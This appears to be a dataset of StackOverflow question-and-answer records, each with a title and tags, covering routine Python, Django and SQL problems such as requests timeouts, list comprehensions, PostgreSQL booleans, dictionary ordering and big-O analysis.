What could be the possible reason(s)? Any remedy? What is the default timeout that `get` uses? | > What is the default timeout that get uses?
The default timeout is `None`, which means it'll wait (hang) until the connection is closed.
Just [specify a timeout value](https://requests.readthedocs.io/en/latest/user/advanced/#timeouts), like this:
```
r = requests.get(
'http://www.example.com',
proxies={'http': '222.255.169.74:8080'},
timeout=5
)
``` | From [requests documentation](http://docs.python-requests.org/en/latest/user/quickstart/#timeouts):
> You can tell Requests to stop waiting for a response after a given
> number of seconds with the timeout parameter:
>
> ```
> >>> requests.get('http://github.com', timeout=0.001)
> Traceback (most recent call last):
> File "<stdin>", line 1, in <module>
> requests.exceptions.Timeout: HTTPConnectionPool(host='github.com', port=80): Request timed out. (timeout=0.001)
> ```
>
> Note:
>
> timeout is not a time limit on the entire response download; rather,
> an exception is raised if the server has not issued a response for
> timeout seconds (more precisely, if no bytes have been received on the
> underlying socket for timeout seconds).
It happens a lot to me that requests.get() takes a very long time to return even if the `timeout` is 1 second. There are a few way to overcome this problem:
**1. Use the `TimeoutSauce` internal class**
From: <https://github.com/kennethreitz/requests/issues/1928#issuecomment-35811896>
> ```
> import requests from requests.adapters import TimeoutSauce
>
> class MyTimeout(TimeoutSauce):
> def __init__(self, *args, **kwargs):
> if kwargs['connect'] is None:
> kwargs['connect'] = 5
> if kwargs['read'] is None:
> kwargs['read'] = 5
> super(MyTimeout, self).__init__(*args, **kwargs)
>
> requests.adapters.TimeoutSauce = MyTimeout
> ```
>
> This code should cause us to set the read timeout as equal to the
> connect timeout, which is the timeout value you pass on your
> Session.get() call. (Note that I haven't actually tested this code, so
> it may need some quick debugging, I just wrote it straight into the
> GitHub window.)
**2. Use a fork of requests from kevinburke:** <https://github.com/kevinburke/requests/tree/connect-timeout>
From its documentation: <https://github.com/kevinburke/requests/blob/connect-timeout/docs/user/advanced.rst>
> If you specify a single value for the timeout, like this:
>
> ```
> r = requests.get('https://github.com', timeout=5)
> ```
>
> The timeout value will be applied to both the connect and the read
> timeouts. Specify a tuple if you would like to set the values
> separately:
>
> ```
> r = requests.get('https://github.com', timeout=(3.05, 27))
> ```
NOTE: [The change has since been merged to the main Requests project](https://github.com/kennethreitz/requests/pull/1801).
**3. Using `evenlet` or `signal` as already mentioned in the similar question:**
[Timeout for python requests.get entire response](https://stackoverflow.com/questions/21965484/timeout-for-python-requests-get-entire-response) | Why doesn't requests.get() return? What is the default timeout that requests.get() uses? | [
"",
"python",
"get",
"python-requests",
""
] |
```
n = [3, 5, 7]
def double(lst):
for x in lst:
x *= 2
print x
return lst
print double(n)
```
Why doesn't this return `n = [6, 10, 14]`?
There should also be a better solution that looks something like `[x *=2 for x in lst]` but it doesn't work either.
Any other tips about for-loops and lists would be much appreciated. | > Why doesn't this return `n = [6, 10, 14]`?
Because `n`, or `lst` as it is called inside `double`, is never modified. `x *= 2` is equivalent to `x = x * 2` for numbers `x`, and that only re-binds the *name* `x` without changing the object it references.
To see this, modify `double` as follows:
```
def double(lst):
for i, x in enumerate(lst):
x *= 2
print("x = %s" % x)
print("lst[%d] = %s" % (i, lst[i]))
```
To change a list of numbers in-place, you have to reassign its elements:
```
def double(lst):
for i in xrange(len(lst)):
lst[i] *= 2
```
If you don't want to modify it in-place, use a comprehension:
```
def double(lst):
return [x * 2 for x in lst]
``` | ```
n = [3, 5, 7]
def double(lst):
for x in lst:
x *= 2
print x # item value changed and printed
return lst # original lst returned
print double(n)
```
you only modified item value inside a list and printed its number but returning original lst list.
`[x *=2 for x in lst]` is wrong syntax, the correct way to write is `[x*2 for x in lst]`.
Another way is to use lambda with map:
```
print(list(map(lambda x:x*2,[1,2,3])))
```
Note: `print((lambda x:x*2)([1,2,3]))` will give wrong answer, it outputs in `[1, 2, 3, 1, 2, 3]` same as doing `[1,2,3]*2` | How to double all the values in a list | [
"",
"python",
"list",
"for-loop",
""
] |
i am learning python from code academy, and i'm trying to complete their review assignment.
I am supposed to define a function, and then set up a if/else loop to check the type of input i get, and then return either absolute value of an int/float or an error message.
I tried to look at similar questions, but i don't understand those codes are a lot more complicated than i can understand O\_O. I looked at the function module lessons again, but i think i followed the function making pattern correctly ? Is there supposed to be an extra line before i call the function ? I tried to keep going, but then i am gettnig this same error message in the other exercises.
I would appreciate any responses :)
```
def distance_from_zero(thing):
thing = input
if type(thing) != int or float:
return "Not an integer or float!"
else:
return abs(thing)
distance_from_zero(thing)
``` | Are you trying to use the input function to get a value from the user ?
if so, you must add parenthesis to it:
```
thing = input()
# If you're using python 2.X, you should use raw_input instead:
# thing = raw_input()
```
Also, you don't need the input parameter if that's what you're trying to do.
If you do mean `input` to be a parameter, then you're trying to use variables before defining them. `distance_from_zero(thing)` can't work since `thing` hasn't been defined outside your function, so you should either define that variable first or call it with a litteral value:
```
thing = 42
distance_from_zero(thing)
# or
distance_from_zero(42)
``` | You do not define the `thing`. Please try
```
def distance_from_zero(thing):
if type(thing) != int or float:
return "Not an integer or float!"
else:
return abs(thing)
thing = 1
distance_from_zero(thing)
```
Or your meaning is this, accepting the user input?
```
def distance_from_zero():
thing = int(input())
if type(thing) != int or float:
return "Not an integer or float!"
else:
return abs(thing)
distance_from_zero()
```
And your code `if type(thing) != int or float:` will always go to `True` for it is `if (type(thing) != int) or float`. Change it to `if not isinstance(thing, (int, float)):`. | how do i fix a "NameError: name 'thing' is not defined" when calling a function ? | [
"",
"python",
"function",
""
] |
I am trying to register a new user on the site,
```
class UserInfo(models.Model):
user = models.ForeignKey(User,primary_key=True)#user profile
email_id=models.CharField(max_length=32, null=True, blank=True)
```
When I am registering the user, I am getting stuck by **Integrity Error**, please help me to resolve the problem.
```
def registration(request):
registration_dict = {}
if 1==1 :
#if request.POST:
#username=request.POST['email']
#password=request.POST['password']
username="admin@admin.com"
password='123456'
#try:
UserInfo.objects.get_or_create(email_id=username,user__username=username,user__email=username,user__password=password)
#except:
# registration_dict["status"]="0"
# registration_dict["message"]="Username already present"
# return HttpResponse(simplejson.dumps(registration_dict),content_type="application/json")
registration_dict["status"]="1"
registration_dict["message"]="Thank You for registering"
return HttpResponse(simplejson.dumps(registration_dict),content_type="application/json")
else:
registration_dict["status"]="0"
registration_dict["message"]="Unable to process the request"
return HttpResponse(simplejson.dumps(registration_dict),content_type="application/json")
```
**EDIT 1**
I have tried changing
`UserInfo.objects.get_or_create(email_id=username,user__username=username,user__email=username,user__password=password,user_id=1)`
and then the error changes, to
```
'Cannot add or update a child row: a foreign key constraint fails (`app_info`.`appdata_userinfo`, CONSTRAINT `user_id_refs_id_b0fd803b` FOREIGN KEY (`user_id`) REFERENCES `auth_user` (`id`))')
``` | From the limited information I would say the problem is
it does not find a UserInfo that matches. It then tries to create a new UserInfo, but it has no User to assign to the User ForeignKey. I would suggest the following:
```
user = authenticate(username=email, password=password)
if user is None:
user = User(username=email, password=password, email=email)
user_info = UserInfo.objects.get_or_create(user=user, email_id=email)
``` | If the original User object doesn't exist, you'll run into all kinds of problems. So, you need to break the process down into two steps.
1. Check if a `User` object exists or not, if it doesn't create it.
2. Check if a `UserInfo` object exists *for that user*, if it doesn't create it.
As there is a `ForeignKey`, you cannot do it in one step:
```
username = "admin@admin.com"
password = '123456'
obj, created = User.objects.get_or_create(username=username)
obj.set_password(password) # the proper way to set the password
obj.save()
# Now fetch or create a UserInfo object
info, created = UserInfo.objects.get_or_create(email_id=username,user=obj)
``` | IntegrityError - Column 'user_id' cannot be null | [
"",
"python",
"django",
"django-views",
""
] |
I am running the following sql query in my web app:
```
SELECT EXISTS (
SELECT id
FROM user
WHERE membership=1244)
```
i was expecting **true** (boolean data) as the result but I'm getting 't' or 'f' for false.
How do I get it to return to my lua code a standard boolean?
I found the following post:
[Reading boolean correctly from Postgres by PHP](https://stackoverflow.com/questions/1314489/reading-boolean-correctly-from-postgres-by-php)
And so I tried to change my code to something like this:
```
SELECT EXISTS ::int (
SELECT id
FROM user
WHERE membership=1244)
```
or
```
SELECT ::INT (SELECT EXISTS (
SELECT id
FROM user
WHERE membership=1244))
```
But I'm getting a syntax error.
Can you tell the best way to handle this? Should I be casting the resulting 't' to a boolean somehow? or is there a way to tell postgresql to return true / false instead of 't'/'f'?
Thanks. | You are so close
```
SELECT EXISTS (SELECT id FROM user WHERE membership=1244)::int
``` | Your first query do indeed return a boolean. A `t` is shown as the returned value of the query
```
select exists (select 1);
exists
--------
t
```
But if you check its type it is a boolean:
```
select pg_typeof(exists (select 1));
pg_typeof
-----------
boolean
```
You will have to check with the lua's postgresql driver manual how to properly handle it. | checking for boolean true / false result in postgresql query | [
"",
"sql",
"postgresql",
"lua",
""
] |
When working with `simplejson` in Django, I sometimes need to send the information strictly in order.
```
values = {"entry1":"value1","entry2":"value2","entry3":"value3"}
return HttpResponse(simplejson.dumps(values),content_type="application/json")
```
That's what it returns
```
{"entry2": "value2", "entry3": "value3", "entry1": "value1"}
```
But I want it to returns this instead:
```
{"entry1":"value1","entry2":"value2","entry3":"value3"}
```
How can I send the information in order in `simplejson`? | > I sometimes need to send the information strictly in order.
Don't use a dictionary then, use a list of tuples:
```
values = [("entry1", "value1"), ("entry2", "value2"), ("entry3", "value3")]
```
Dictionaries *and* JSON objects do not have a set order. Neither will preserve your input order, nor are they required to.
To quote the [JSON RFC](https://www.rfc-editor.org/rfc/rfc4627):
> An object is an unordered collection of zero or more name/value pairs [...]
and the Python [`dict.items()`](http://docs.python.org/2/library/stdtypes.html#dict.items) documentation:
> Keys and values are listed in an arbitrary order which is non-random, varies across Python implementations, and depends on the dictionary’s history of insertions and deletions. | The traditional way of solving this issue is by using 2-dimensional tuple/list, as suggested by Martjin Pieters.
The more Pythonic way of accomplishing this is by using OrderedDict, however.
For similar question/solution see:
[Can I get JSON to load into an OrderedDict in Python?](https://stackoverflow.com/questions/6921699/can-i-get-json-to-load-into-an-ordereddict-in-python)
For OrderedDict documentation see: <http://docs.python.org/2/library/collections.html#collections.OrderedDict> | simplejson returns values not in order | [
"",
"python",
"django",
"json",
"simplejson",
""
] |
```
SELECT TOP 4000 Users.Id
FROM Users
JOIN Streams ON Users.Id = Streams.UserId
JOIN Playlists ON Streams.Id = Playlists.StreamId
WHERE Playlists.FirstItemId = '00000000-0000-0000-0000-000000000000'
// Doesn't work
HAVING COUNT(1) = (
SELECT COUNT(Playlists.Id)
FROM Playlists WHERE Playlists.StreamId = Streams.Id
)
```
I'm trying to select all Users who have only Streams with 1 Playlist and whose 1 Playlist has a FirstItemId of Guid.Empty. I'm trying to do some database maintenance and remove accounts which were created but never used.
I've got the first part of the query working pretty well, but I'm not sure how I can apply my 'Having only 1 child' filter properly. | try the query below, to select inactive user out
```
SELECT TOP 4000 Users.Id
FROM Users
JOIN Streams ON Users.Id = Streams.UserId
JOIN Playlists ON Streams.Id = Playlists.StreamId
WHERE Playlists.FirstItemId = '00000000-0000-0000-0000-000000000000'
AND (SELECT COUNT(Playlists.Id) FROM Playlists WHERE Playlists.StreamId = Streams.Id) =1
``` | I think you can accomplish this pretty easily with a WHERE NOT EXISTS clause
```
SELECT TOP 4000 Users.Id
FROM Users
JOIN Streams ON Users.Id = Streams.UserId
JOIN Playlists ON Streams.Id = Playlists.StreamId
WHERE Playlists.FirstItemId = '00000000-0000-0000-0000-000000000000'
AND NOT EXISTS (
SELECT 1 FROM Playlists
WHERE Playlists.StreamId <> Playlists.FirstItemId
)
)
``` | Select only parents with one child | [
"",
"sql",
"sql-server",
""
] |
Have the table:
```
Game
----------
ID
UploadDate
LastUpdate
```
Where `UploadDate` is the date the game was uploaded, and `LastUpdate` is the date of the last update for the game.
New games will have `UploadDate == LastUpdate`.
I want to return `Most recently updated games`. They should be ordered by `LastUpdate` descending, but if `UploadDate == LastUpdate` they should be pushed to the bottom of the list.
I've tried:
```
ORDER BY UploadDate <> LastUpdate, LastUpdate DESC
```
But the syntax is incorrect. Can anyone help me with this order by query? | The syntax you are using is appropriate for MySQL. The following works in almost all databases:
```
ORDER BY (case when UploadDate <> LastUpdate then 1 else 0 end) desc, LastUpdate DESC
``` | You're very close - the order by clause needs values to order by - not boolean conditions. Instead, you can wrap the condition in a CASE statement, for example:
```
ORDER BY CASE WHEN UploadDate <> LastUpdate THEN 0 ELSE 1 END ASC, LastUpdate DESC
``` | SQL Order by where dates not equal | [
"",
"sql",
"sql-server",
"sql-order-by",
""
] |
The inverse of this question (finding a string in a list) is so popular, that I wasn't able to find an answer to my question.
```
black_list = ["ab:", "cd:", "ef:", "gh:"]
for line in some_file:
if ":" in line and black_list not in line:
pass
```
This obviously doesn't work. Some iteration over the list needs to happen that returns true/false, but I don't know how to accomplish that elegantly. Thanks. | The builtin [`any()`](http://docs.python.org/2/library/functions.html#any) function can help you here:
```
black_list = ["ab:", "cd:", "ef:", "gh:"]
for line in some_file:
if ":" in line and not any(x in line for x in black_list):
pass
```
It's also possible to get the same effect with [`all()`](http://docs.python.org/2/library/functions.html#all):
```
for line in some_file:
if ":" in line and all(x not in line for x in black_list):
pass
```
... but I think the first is closer to English, so easier to follow. | Your example code makes it look like you're looking for an element in a file, not just in a string. Regardless, you could do something like this, which illustrates doing both with the built-in `any()`function:
```
def check_string(text, word_list):
return any(phrase in text for phrase in word_list)
def check_file(filename, word_list):
with open(filename) as some_file:
return any(check_string(line, word_list) for line in some_file)
black_list = ["ab:", "cd:", "ef:", "gh:"]
print check_file('some_file.txt', black_list)
``` | How to check if elements of a list are in a string | [
"",
"python",
"string",
"list",
"if-statement",
"element",
""
] |
I am trying to modify a string , by replacing each alphabet by an alphabet which is two postions ahead of it. e.g. 'a' replaced by 'c', 'b' replaced by 'd'. The only exceptions is 'y' should be replaced by 'a' and 'z' by 'b' (loops back to start).
I have written the following code for it, which seems to serve the purpose, but the output formatting kind of spoils it.
```
string = "g fmnc wms bgblr rpylqjyrc gr zw fylb."
print string
for i in string:
if i.isalpha():
if ord(i)>120:
print chr(ord(i)-24),
else:
print chr(ord(i)+2),
else:
print i
```
**Output :**
```
g fmnc wms bgblr rpylqjyrc gr zw fylb.
i h o p e y o u d i d n t t r a n s l a t e i t b y h a n d .
```
**Expected Output:**
```
g fmnc wms bgblr rpylqjyrc gr zw fylb.
i hope you didnt translate it by hand.
```
Is there any alternative, quicker approach to solve this? | The `print i,` syntax adds a space at the end of the thing that's being printed. You could solve this by putting all your characters in a list and `''.join()`ing them in the end:
```
string = "g fmnc wms bgblr rpylqjyrc gr zw fylb."
print string
answer = []
for i in string:
if i.isalpha():
if ord(i)>120:
answer.append(chr(ord(i)-24))
else:
answer.append(chr(ord(i)+2))
else:
answer.append(i)
print ''.join(answer)
```
Of course, as others have suggested, `string.translate` will likely be far more straightforward | Here is a solution using string.translate:
```
from string import translate, maketrans, ascii_lowercase
s='g fmnc wms bgblr rpylqjyrc gr zw fylb.'
rot2=maketrans(
ascii_lowercase,
ascii_lowercase[2:]+ascii_lowercase[:2]
)
print s.translate(rot2)
``` | String Manipulation Python | [
"",
"python",
"string",
"python-2.6",
""
] |
Given that we have an HTML file as shown below:
```
</pre>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a>
<img src="/icons/unknown.gif" alt="[ ]"> <a href="AAAAAAA.jpg">AAAAAAA.jpg</a> 16-Jan-2008 01:27 827K
<img src="/icons/unknown.gif" alt="[ ]"> <a href="AAAAAAA.jpg.xml">AAAAAAA.jpg.xml</a> 16-Jan-2008 01:28 12K
<img src="/icons/image2.gif" alt="[IMG]"> <a href="BBBBB.AAAAAAAA.txt">BBBBB.AAAAAAAA.txt</a> 16-Jan-2008 15:01 1.6K
<img src="/icons/unknown.gif" alt="[ ]"> <a href="js421254.jpg">AAAAAAA.jpg</a> 16-Jan-2008 01:27 827K
<img src="/icons/unknown.gif" alt="[ ]"> <a href="js421254.jpg.xml">AAAAAAA.jpg.xml</a> 16-Jan-2008 01:28 12K
...
...
...
<img src="/icons/image2.gif" alt="[IMG]"> <a href="BBdBBB.AAAAsaAAAA.txt">BBBBB.AAAAAAAA.txt</a> 16-Jan-2008 15:01 1.6K
<img src="/icons/unknown.gif" alt="[ ]"> <a href="52542.jpg">AAAAAAA.jpg</a> 16-Jan-2008 01:27 827K
<img src="/icons/unknown.gif" alt="[ ]"> <a href="52542.jpg.xml">AAAAAAA.jpg.xml</a> 16-Jan-2008 01:28 12K
<hr></pre>
</body></html>
```
How is it possible to make a new text file containing the characters as shown below:
Expected result:
```
AAAAAAA.jpg
js421254.jpg
...
...
...
52542.jpg
``` | I hope this regex generalizes correctly:
```
with open('path/to/file') as infile, open('/path/to/output', 'w') as outfile:
for line in infile:
if line.startswith('lt="[ ]"'):
hrefs = re.findall("\<a\\s+href=.*\</a\>?", line)
for href in hrefs:
target = href.split('=', 1)[1].split(">", 1)[0].strip('"')
outfile.write("%s\n" target)
```
Hope this helps | [BeautifulSoup](http://www.crummy.com/software/BeautifulSoup/) is good for webscraping:
```
from BeautifulSoup import BeautifulSoup
soup = BeautifulSoup("""<img src="/icons/blank.gif" alt="Icon ">
<a href="?C=N;O=D">Name</a>
<img src="/icons/unknown.gif" alt="[ ]">
<a href="AAAAAAA.jpg">AAAAAAA.jpg</a> 16-Jan-2008 01:27 827K
<img src="/icons/unknown.gif" alt="[ ]">
<a href="AAAAAAA.jpg.xml">AAAAAAA.jpg.xml</a> 16-Jan-2008 01:28 12K
<img src="/icons/image2.gif" alt="[IMG]">
<a href="BBBBB.AAAAAAAA.txt">BBBBB.AAAAAAAA.txt</a> 16-Jan-2008 15:01 1.6K
<img src="/icons/unknown.gif" alt="[ ]">
<a href="js421254.jpg">AAAAAAA.jpg</a> 16-Jan-2008 01:27 827K
<img src="/icons/unknown.gif" alt="[ ]">
<a href="js421254.jpg.xml">AAAAAAA.jpg.xml</a> 16-Jan-2008 01:28 12K""")
>>> for a in soup.findAll('a'):
... if str(a.text).strip().lower().endswith('jpg'): print a.text
...
AAAAAAA.jpg
AAAAAAA.jpg
>>>
>>> for a in soup.findAll('a'):
... if a.get('href').strip().lower().endswith('jpg'): print a.get('href')
...
AAAAAAA.jpg
js421254.jpg
```
If you want pure Python and your use case is simple enough, you can try regular expressions. This is trickier because in the real world there are a lot of corner cases and malformed HTML out there.
```
import re
>>> for match in re.findall(r'<a .+?>(.+?)</a>', html):
... if match.strip().lower().endswith('jpg'): print match
...
AAAAAAA.jpg
AAAAAAA.jpg
>>>
```
Or this if your are looking at the href attribute:
```
>>> for match in re.findall(r'<a href="(.+?)">', html):
... if match.lower().endswith('jpg'): print match
...
AAAAAAA.jpg
js421254.jpg
```
If you are just scraping something simple like porn sites you should get good results with regular expressions.
> could you please explain me str(a.text).strip().lower().endswith('jpg')? – guava
* **strip**: this method returns the string without spaces (including tabs and newlines) that occur at the start or end of the string
* **lower**: converts to lower case (so you don't need to test for all the case variations like JPG, jpg, Jpg).
* **endswith**: returns True if the string ends with the argument you provide (the thing you are looking for).
> thank you @Paulo Scardine i also could not understand `re.findall(r'<a href="(.+?)">'`, – guava
Well, the re module is Python implementation of [regular expressions](http://docs.python.org/2/library/re.html) - a vast subject that has books larger than bibles about it (OK, maybe larger than the new testament). I will not pretend I can scratch the surface of it in a stackoverflow answer.
First thing you may find strange is the `r` in front of the quotes. It is a [raw string literal](http://docs.python.org/release/2.5.2/ref/strings.html), a string where you don't have to escape the `\` because unlike regular strings, the backslash has no special meaning inside raw strings (backslashes are used all the time in regular expressions, it just occurred to me that I'm not using patterns with backslashes in this case - the power of the habit...)
Now to the expression: the `()` mark the group you want to capture. The dot means any character, the plus sign means one or more of them, and the `?` means the search is not greedy (the default is a greedy search where the `.+` would match any character, including the quotes). Just try the same expression without the `?` and you will understand what happens. | Extracting some data from an HTML file and writing it to another file | [
"",
"python",
"python-2.7",
"python-3.x",
""
] |
I want to iterate through a dictionary in python by index number.
Example :
```
dict = {'apple':'red','mango':'green','orange':'orange'}
```
I want to iterate through the dictionary from first to last, so that I can access the dictionary items by their indexes. For example, the 1st item will be apple, and the 2nd item will be mango and value will be green.
Something like this:
```
for i in range(0,len(dict)):
dict.i
``` | I can't think of any reason why you would want to do that. If you just need to iterate over the dictionary, you can just do.
```
for key, elem in testDict.items():
print key, elem
```
**OR**
```
for i in testDict:
print i, testDict[i]
``` | You can iterate over keys and get values by keys:
```
for key in dict.iterkeys():
print key, dict[key]
```
You can iterate over keys and corresponding values:
```
for key, value in dict.iteritems():
print key, value
```
You can use `enumerate` if you want indexes (remember that dictionaries don't have an order):
```
>>> for index, key in enumerate(dict):
... print index, key
...
0 orange
1 mango
2 apple
>>>
``` | Python Iterate Dictionary by Index | [
"",
"python",
"dictionary",
""
] |
I got a table with Cities and States it looks something like:
```
cityid |city |stateid |state
--------------------------------------
0566 |abriaqui|05 |antioquia
0599 |alejand |05 |antioquia
0511 |another |05 |antioquia
0782 |dummy1 |09 |caldas
0783 |dummy2 |09 |caldas
0785 |dummy3 |09 |caldas
0788 |dummy4 |03 |Narino
0767 |dummy5 |03 |Narino
0734 |dummy6 |03 |Narino
```
As you can see I have Cities with uniques IDs, and the state they belong to is just to the right, with the state id and the state name. I would like to make a query that returns something similar to DINSTINCT(state):
```
STATE
--------------------
antioquia
caldas
narino
```
But I need the stateid too. How can I reach this? | Just do something like this:
```
SELECT DISTINCT state, stateid
FROM table
``` | Try this way:
```
select distinct state, stateid
from tab
```
you can also use `group by` clause
```
select state, stateid
from tab
group by state, stateid
```
Group by is useful if you need some aggregation function.
Solution is depend of your requirements. | Use DISTINCT with two columns (or something that works) | [
"",
"sql",
"distinct",
""
] |
I have seen questions similar to this but not quite the same. I have an expression
```
if foo == ....
return -1
elif myFunction(bar) != -1:
return myFunction(bar)
elif ...
```
I don't want to calculate `myFunction(bar)` twice. If it were simply an `if`, I could do
```
temp = myFunction(bar)
if temp != -1
return temp
```
However doing this with an `elif` would result in unnecessary calculations of `temp` if we were to follow the intitial `if`.
I can see a solution using an
```
if ...
else
temp = myFunction(bar)
if temp != -1:
return temp
elif ...
```
But that now starts to become more ugly. Is there a better way to accomplish this? | If you do this a lot, it might pay to have a [memoizing decorator](http://wiki.python.org/moin/PythonDecoratorLibrary#Memoize) around. The only memoizer that is currently in the standard library (for newer Python 3.x) is `lru_cache`, which is overkill, but shows the general idea:
```
>>> def func():
... print("foo")
... return 1
...
>>> if func():
... print(func())
...
foo
foo
1
```
Now memoize `func`:
```
>>> from functools import lru_cache
>>> func = lru_cache(1)(func)
>>> if func():
... print(func())
...
foo
1
``` | If you do not want to call myFunction(bar) twice then there is no other way than using an intermediate variable to store the result in. People here start proposing complex caching solutions for this. This can be pretty convenient in extreme cases, but before doing so, let's get back to the basics a bit. You should make proper use of the fact that you want to return from within your conditional blocks. In these situations you can save many `else`s. What follows now basically is the code block from your question, but without dots, with proper indentation, and with names according to PEP8:
```
if foo == "bar"
return -1
elif myfunction(bar) != -1:
return myfunction(bar)
else
return None
```
It can easily be replaced with:
```
if foo == "bar"
return -1
t = myfunction(bar)
if t != -1:
return t
return None
```
As already stated in another answer, you can call your function twice if it does not affect the performance of your code. The result would look as simple as
```
if foo == "bar"
return -1
if myfunction(bar) != -1:
return myfunction(bar)
return None
``` | Python assignment and test of function using elif | [
"",
"python",
"if-statement",
"variable-assignment",
""
] |
How would I go about telling if my code runs on O(N) time (linear time?) or O(N^2) time or something else? Practice tests online dock points for codes that take to long to compute.
I understand that it is best to have a script in which the time it takes to run is proportional to the length of input data only ( O(N) time ), and I am wondering if that is what my code is doing. And how could one tell how fast the code runs?
Below I included a script I wrote that I am concerned about. It is from a practice exam problem in which you are given a series of 'a's and 'b's and you are to compute the palindromes. So if you are given s = "baababa", there are 6 palindromes: 'aa', 'baab', 'aba', 'bab', 'ababa', & 'aba'.
```
def palindrome(s):
length = len(s)
last = len(s)-1
count = 0
for index, i in enumerate(s):
left=1
right=1
left2=1
right2=1
for j in range(0,index+1): #+1 because exclusive
if index-left2+1>=0 and index+right2<=last and s[index-left2+1]==s[index+right2]:
print s[index-left2+1:index+right2+1] #+1 because exclusive
left2 +=1
right2 +=1
count +=1
elif index-left>=0 and index+right<=last and s[index-left] == s[index+right]:
print s[index-left:index+right+1] #+1 because exclusive
left += 1
right +=1
count += 1
return count
```
Is this O(N) time? I loop through the entire list only once but there is a smaller loop as well... | it's O(N^2).
You have one loop from 0 to N and second loop goes from 0 to i. Let's see how much operations you have to perform. For each 'i' we look at the size of the list for j from 0 to i + 1 (let's take N = 7):
```
i = 0 | x x _ _ _ _ _ _ -
i = 1 | x x x _ _ _ _ _ |
i = 2 | x x x x _ _ _ _ |
i = 3 | x x x x x _ _ _ N
i = 4 | x x x x x x _ _ |
i = 5 | x x x x x x x _ |
i = 6 | x x x x x x x x _
|-----N + 1-----|
```
The area of the whole rectangle is ~ N \* N ( actually N \* (N + 1), but it does not matter that much here), so we see that there ~ N ^ 2 / 2 operations. And it's O(N^2). | Well, lets consider this. The size of the input is `n = len(s)`. For each character, you loop from 0 to index. So we can get the following
```
for i = 0 to n
for j = 0 to i + 1
1
```
Which can be reduced to
```
for i = 0 to n
(i + 1)(i + 2)
```
Which then gives us
```
for i = 0 to n
i^2 + 3i + 2
```
We can then split this up and reduce it, we know that
`3i + 2` will reduce to `3(n)(n + 1) + 2n = 3n^2 + 5n` which right away is not linear as it's O(n^2).
I also don't understand what you're doing by having the second for loop, you can compute a palindrome in linear time by comparing the last and first characters.
If you're wondering how: <http://rosettacode.org/wiki/Palindrome_detection#Python> | Python Script: How to tell if in O(N) or O(N^2) time? | [
"",
"python",
"performance",
"big-o",
"palindrome",
""
] |
Here is my code:
```
# library to extract cookies in a http message
cj = cookielib.CookieJar()
... do connect to httpserver etc
cdict = ((c.name,c.value) for c in cj)
```
The problem with this code is cdict is a generator. But I want to simply create a dictionary. How can I change the last line to assign to a dictionary? | Use a dictionary comprehension. (Introduced in Python 2.7)
`cdict = {c.name:c.value for c in cj}`
For example,
```
>>> {i:i*2 for i in range(10)}
{0: 0, 1: 2, 2: 4, 3: 6, 4: 8, 5: 10, 6: 12, 7: 14, 8: 16, 9: 18}
```
Here is the [PEP](http://www.python.org/dev/peps/pep-0274/) which introduced Dictionary Comprehensions. It may be useful.
**If you are on something below Python 2.7.** - Build a list of key value pairs and call `dict()` on them, something like this.
```
>>> keyValList = [(i, i*2) for i in range(10)]
>>> keyValList
[(0, 0), (1, 2), (2, 4), (3, 6), (4, 8), (5, 10), (6, 12), (7, 14), (8, 16), (9, 18)]
>>> dict(keyValList)
{0: 0, 1: 2, 2: 4, 3: 6, 4: 8, 5: 10, 6: 12, 7: 14, 8: 16, 9: 18}
```
**OR** Just pass your generator to the [`dict()`](http://docs.python.org/2/library/functions.html#func-dict) method. Something like this
```
>>> dict((i, i*2) for i in range(10))
{0: 0, 1: 2, 2: 4, 3: 6, 4: 8, 5: 10, 6: 12, 7: 14, 8: 16, 9: 18}
``` | You can use a [*dict comprehension*](http://www.python.org/dev/peps/pep-0274/):
```
cdict = {c.name: c.value for c in cj}
``` | Convert generator object to a dictionary | [
"",
"python",
""
] |
As a recursion practice exercise, I am writing a Python function that recursively identifies if the input list is sorted from least to greatest, real numbers only, and then returns a Boolean value.
My code is:
```
def det_sorted(listA):
if len(listA) == 1:
return(True)
else:
if listA[0] <= det_sorted(listA[1:]):
return(True)
elif listA[0] > det_sorted(listA[1:]):
return(False)
```
This function always returns 'False.' The general question: how do I iterate recursively through the list correctly? My specific question: what have I done wrong here? | you are close , you want to call the recursion for the return
```
else:
if listA[0] <= listA[1]:
return sorted(listA[1:])
```
or you could combine both statements into the return (and get rid of the else)
```
return listA[0] <= listA[1] and sorted(listA[1:])
``` | @Joran Beasley's answer is correct, but here's another solution to the problem that should be a bit quicker:
```
def is_sorted(l, prev=None):
if l:
if prev is None: return is_sorted(l[1:], l[0])
else: return l[0] > prev and is_sorted(l[1:], l[0])
else:
return True
``` | Recursively Identifying Sorted Lists | [
"",
"python",
"list",
"sorting",
"recursion",
"python-3.x",
""
] |
I'm trying to find if a particular sentence pattern has an abbreviated word like R.E.M. or CEO. An abbreviated words that I am looking for is words with capital letters punctuated with period like R.E.M. or all caps.
```
#sentence pattern = 'What is/was a/an(optional) word(abbreviated or not) ?
sentence1 = 'What is a CEO'
sentence2 = 'What is a geisha?'
sentence3 = 'What is ``R.E.M.``?'
```
This is what I have but it's not returning anything at all. It doesn't recognise the pattern. I can't figure out what is wrong with the regex.
```
c5 = re.compile("^[w|W]hat (is|are|was|were|\'s)( a| an| the)*( \`\`)*( [A-Z\.]+\s)*( \'\')* \?$")
if c5.match(question):
return "True."
```
EDIT: I am looking to see if the sentence pattern above has an abbreviated word. | You've got a few issues. It's not really clear from your examples what sort of quoting might be expected, or if you want to match the ones that don't end in question marks. Your regex uses `*` (zero or any number of the previous) when I think you can use `?` (zero or one of the previous). You also will miss sentences with `What's` even though I think you want those, because you're looking for `What 's` instead.
Here's a possible solution:
```
import re
sentence1 = "What is a CEO"
sentence2 = "What is a geisha?"
sentence3 = "What is ``R.E.M.``?"
sentence4 = "What's SCUBA?"
c1 = re.compile(r"^[wW]hat(?: is| are| was| were|\'s)(?: a| an| the)? [`']{0,2}((?:[A-Z]\.)+|[A-Z]+)[`']{0,2} ?\??")
def test(question, regex):
if regex.match(question):
return "Matched!"
else:
return "Nope!"
test(sentence1,c1)
> "Matched!"
test(sentence2,c1)
> "Nope!"
test(sentence3,c1)
> "Matched!"
test(sentence4,c1)
> "Matched!"
```
But it could probably be tweaked more depending on whether you expect the abbreviation to be double-quoted, for example. | The position of the spaces before and after your abbreviation check are off.
You might also want to check your quote handling. Perhaps it's just an artefact of posting your code here, but there seems to be some confusion with your ' and `'s. Try
```
['`"]*
```
instead for both. | Regex to match certain sentence pattern with Python | [
"",
"python",
"regex",
""
] |
